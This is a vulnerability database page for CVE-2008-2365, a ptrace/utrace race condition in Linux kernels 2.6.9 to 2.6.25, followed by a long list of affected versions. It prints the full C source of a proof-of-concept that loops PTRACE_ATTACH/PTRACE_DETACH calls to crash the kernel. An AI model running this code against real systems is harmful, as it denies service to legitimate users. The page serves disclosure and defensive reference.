CVE-2008-2365

EPSS

0.04%V3

Vector

Local

Published

2008-06-30 19:00 +00:00

Last Modified

2017-09-28 10:57 +00:00

Official links

CVE.org

NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.

Alert management

List of Alerts

Alert for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2024-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

Descriptions

Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.

Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-362	Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') The product contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.

Metrics

Metric	Score	Severity	CVSS Vector	Source
V2	4.7		AV:L/AC:M/Au:N/C:N/I:N/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 31965

Publication date : 2008-06-24 22:00 +00:00
Author : Alexei Dobryanov
EDB Verified : Yes

Exploit Database EDB-ID : 31966

Publication date : 2008-06-24 22:00 +00:00
Author : Alexei Dobryanov
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users. */ /* This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely. */ #ifdef __ia64__ #define ia64_fpreg ia64_fpreg_DISABLE #define pt_all_user_regs pt_all_user_regs_DISABLE #endif /* __ia64__ */ #include #ifdef __ia64__ #undef ia64_fpreg #undef pt_all_user_regs #endif /* __ia64__ */ #include #include #include #if defined __i386__ || defined __x86_64__ #include #endif #include #include #include #include #include #include /* WARNING: The real testing count is probably unbound. */ #define DEFAULT_TESTTIME 10 /* seconds */ static pid_t pid; static void cleanup (void) { if (pid != 0) kill (pid, SIGKILL); } static void handler_fail (int signo) { cleanup (); signal (signo, SIG_DFL); raise (signo); } static void *thread_func(void *argv0_pointer) { execl("/proc/self/exe", argv0_pointer, "child", NULL); abort (); /* NOTREACHED */ } int main(int argc, const char *argv[]) { char *testtime = getenv ("TESTTIME"); time_t testend = time (NULL) + (testtime != NULL ? atoi (testtime) : DEFAULT_TESTTIME); unsigned long loops; pthread_t thread; atexit (cleanup); signal (SIGABRT, handler_fail); signal (SIGINT, handler_fail); if ((argc != 2 || strcmp (argv[1], "child") != 0) && (pid = fork())) { loops = 0; do { ptrace(PTRACE_ATTACH, pid, NULL, 0); ptrace(PTRACE_DETACH, pid, NULL, 0); loops++; } while (time (NULL) < testend); return 0; } if (pthread_create(&thread, NULL, thread_func, (void *) argv[0])) perror("pthread_create"); while (1) pause(); /* NOTREACHED */ abort (); }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.9 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.9 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.9 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.9 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.9 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.9 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.10

Linux>>Linux_kernel >> Version 2.6.10 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.10 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.10 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.10 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.10 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.10

Linux>>Linux_kernel >> Version 2.6.10 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11

Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11

Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11

Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11

Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.4

Linux>>Linux_kernel >> Version 2.6.11.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.5

Linux>>Linux_kernel >> Version 2.6.11.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.6

Linux>>Linux_kernel >> Version 2.6.11.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.7

Linux>>Linux_kernel >> Version 2.6.11.7 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.8

Linux>>Linux_kernel >> Version 2.6.11.8 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.11

Linux>>Linux_kernel >> Version 2.6.11.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.11.12

Linux>>Linux_kernel >> Version 2.6.11.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12

Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12

Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12

Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12

Linux>>Linux_kernel >> Version 2.6.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.1

Linux>>Linux_kernel >> Version 2.6.12.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.2

Linux>>Linux_kernel >> Version 2.6.12.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.3

Linux>>Linux_kernel >> Version 2.6.12.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.4

Linux>>Linux_kernel >> Version 2.6.12.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.5

Linux>>Linux_kernel >> Version 2.6.12.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.6

Linux>>Linux_kernel >> Version 2.6.12.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.12

Linux>>Linux_kernel >> Version 2.6.12.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.12.22

Linux>>Linux_kernel >> Version 2.6.12.22 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.1

Linux>>Linux_kernel >> Version 2.6.13.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.2

Linux>>Linux_kernel >> Version 2.6.13.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.3

Linux>>Linux_kernel >> Version 2.6.13.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.4

Linux>>Linux_kernel >> Version 2.6.13.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.1

Linux>>Linux_kernel >> Version 2.6.14.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.2

Linux>>Linux_kernel >> Version 2.6.14.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.3

Linux>>Linux_kernel >> Version 2.6.14.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.4

Linux>>Linux_kernel >> Version 2.6.14.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.5

Linux>>Linux_kernel >> Version 2.6.14.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15.1

Linux>>Linux_kernel >> Version 2.6.15.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15.2

Linux>>Linux_kernel >> Version 2.6.15.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15.3

Linux>>Linux_kernel >> Version 2.6.15.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15.4

Linux>>Linux_kernel >> Version 2.6.15.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.15.11

Linux>>Linux_kernel >> Version 2.6.15.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.1

Linux>>Linux_kernel >> Version 2.6.16.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.7

Linux>>Linux_kernel >> Version 2.6.16.7 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.9

Linux>>Linux_kernel >> Version 2.6.16.9 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.11

Linux>>Linux_kernel >> Version 2.6.16.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.12

Linux>>Linux_kernel >> Version 2.6.16.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.13

Linux>>Linux_kernel >> Version 2.6.16.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.19

Linux>>Linux_kernel >> Version 2.6.16.19 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.23

Linux>>Linux_kernel >> Version 2.6.16.23 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.16.27

Linux>>Linux_kernel >> Version 2.6.16.27 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.1

Linux>>Linux_kernel >> Version 2.6.17.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.2

Linux>>Linux_kernel >> Version 2.6.17.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.3

Linux>>Linux_kernel >> Version 2.6.17.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.5

Linux>>Linux_kernel >> Version 2.6.17.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.6

Linux>>Linux_kernel >> Version 2.6.17.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.7

Linux>>Linux_kernel >> Version 2.6.17.7 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.8

Linux>>Linux_kernel >> Version 2.6.17.8 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.10

Linux>>Linux_kernel >> Version 2.6.17.10 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.11

Linux>>Linux_kernel >> Version 2.6.17.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.12

Linux>>Linux_kernel >> Version 2.6.17.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.13

Linux>>Linux_kernel >> Version 2.6.17.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.17.14

Linux>>Linux_kernel >> Version 2.6.17.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.18 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.18.1

Linux>>Linux_kernel >> Version 2.6.18.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.18.3

Linux>>Linux_kernel >> Version 2.6.18.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.18.4

Linux>>Linux_kernel >> Version 2.6.18.4 (Open CPE detail)